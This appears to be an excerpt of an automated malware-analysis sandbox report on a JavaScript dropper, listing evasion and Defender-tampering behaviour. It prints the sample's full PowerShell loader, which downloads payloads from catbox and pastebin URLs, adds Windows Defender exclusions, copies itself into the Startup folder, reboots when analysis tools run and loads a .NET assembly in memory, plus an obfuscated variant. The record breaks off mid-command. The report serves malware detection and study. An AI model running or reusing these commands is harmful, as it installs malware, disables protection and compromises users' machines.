              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Uses ping.exe to sleep
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2305
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 436
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 689
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1530
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8324
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2141
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7505
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 2305 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 436 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 689 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep count: 1530 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep count: 8324 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 2141 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 7505 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~z\d 7eMJ$
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~z\d 7eMJ$
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~z\d 7eMJ$
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $wgkxz = 'ja' + [char]66 + 'mafqaaw' + [char]66 + 'aafoaiaa9acaaja' + [char]66 + 'oag8acw' + [char]66 + '0ac4avg' + [char]66 + 'lahiacw' + [char]66 + 'pag8abgauae0ayq' + [char]66 + 'qag8acgauaeuacq' + [char]66 + '1ageaba' + [char]66 + 'zacgamgapadsasq' + [char]66 + 'macaakaagacqata' + [char]66 + 'uagsawg' + [char]66 + 'aacaakqagahsaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaa9acaaka' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4asq' + [char]66 + 'pac4aua' + [char]66 + 'hahqaaa' + [char]66 + 'dadoaog' + [char]66 + 'haguada' + [char]66 + 'uaguabq' + [char]66 + 'wafaayq' + [char]66 + '0aggakaapackaow' + [char]66 + 'kaguabaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqa7acqabg' + [char]66 + 'nahmaza' + [char]66 + 'wacaapqagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagyaaq' + [char]66 + 'saguacwauagmayq' + [char]66 + '0agiabw' + [char]66 + '4ac4abq' + [char]66 + 'vagualw' + [char]66 + 'zageaaw' + [char]66 + '1ahuabwauag0acw' + [char]66 + '1accaowakag0azq' + [char]66 + 'uag8acwagad0aiaanaggada' + [char]66 + '0ahaacwa6ac8alw' + [char]66 + 'magkaba' + [char]66 + 'lahmalg' + [char]66 + 'jageada' + [char]66 + 'iag8aeaauag0abw' + [char]66 + 'lac8ang' + [char]66 + 'zagqaag' + [char]66 + 'jadualg' + [char]66 + 'tahmadqanadsaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaa9acaaja' + [char]66 + 'lag4adga6afaaug' + [char]66 + 'paemarq' + [char]66 + 'tafmatw' + [char]66 + 'saf8aqq' + [char]66 + 'saemasa' + [char]66 + 'jafqarq' + [char]66 + 'dafqavq' + [char]66 + 'saeualg' + [char]66 + 'dag8abg' + [char]66 + '0ageaaq' + [char]66 + 'uahmakaanadyanaanackaow' + [char]66 + 'pagyaiaaoacaaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaapacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaakag0azq' + [char]66 + 'uag8acwagadsafq' + [char]66 + 'lagwacw' + [char]66 + 'lacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaaoacqabg' + [char]66 + 'nahmaza' + [char]66 + 'wackaiaa7ah0aowakahkaaw' + [char]66 + 'oahkabgagad0aiaaoacaatg' + [char]66 + 'lahcalq' + [char]66 + 'pagiaag' + [char]66 + 'lagmadaagae4azq' + [char]66 + '0ac4avw' + [char]66 + 'lagiaqw' + [char]66 + 'sagkazq' + [char]66 + 'uahqaiaapacaaowakahkaaw' + [char]66 + 'oahkabgauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azwagad0aia' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4ava' + [char]66 + 'lahgadaauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azw' + [char]66 + 'dadoaog' + [char]66 + 'vafqarga4acaaowakahkaaw' + [char]66 + 'oahkabgauaeqabw' + [char]66 + '3ag4aba' + [char]66 + 'vageaza' + [char]66 + 'gagkaba' + [char]66 + 'lacgaja' + [char]66 + 'uagcacw' + [char]66 + 'kahaalaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqagackaiaa7acqazg' + [char]66 + 'waeqa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ltkzz = $host.version.major.equals(2);if ( $ltkzz ) {$fbkny = ([system.io.path]::gettemppath());del ($fbkny + '\upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$ehgvw = $env:processor_architecture.contains('64');if ( $ehgvw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( new-object net.webclient ) ;$ykhyn.encoding = [system.text.encoding]::utf8 ;$ykhyn.downloadfile($ngsdp, ($fbkny + '\upwin.msu') ) ;$fvdsw = ( 'c:\users\' + [environment]::username );$bjtxj = ( $fbkny + '\upwin.msu' ) ; powershell.exe wusa.exe $bjtxj /quiet /norestart ; copy-item 'c:\users\user\downloads\f-2025-0855\f-2025-0855.js' -destination ( $fvdsw + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true} ;[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit ; } ;$stringbase;function basemy{;$eatvh = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($stringbase));return $eatvh;};$nhqvr = ('https://pastebin.com/raw/byrrps5m' );$cznqf = ( [system.io.path]::gettemppath() + 'dll01.txt');$webclient = new-object system.net.webclient ;$vfjrd = $webclient.downloadstring( $nhqvr ) ;$stringbase = $vfjrd; $vfjrd = basemy;$vfjrd | out-file -filepath $cznqf -encoding 'utf8' -force ;$lyjkg = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$bkrsr = new-object system.net.webclient ;$bkrsr.encoding = [system.text.encoding]::utf8 ;$nfuqg = ( get-content -path $cznqf ) ;$ldmxc = $bkrsr.downloaddata( $nfuqg ) ;$sxrcf 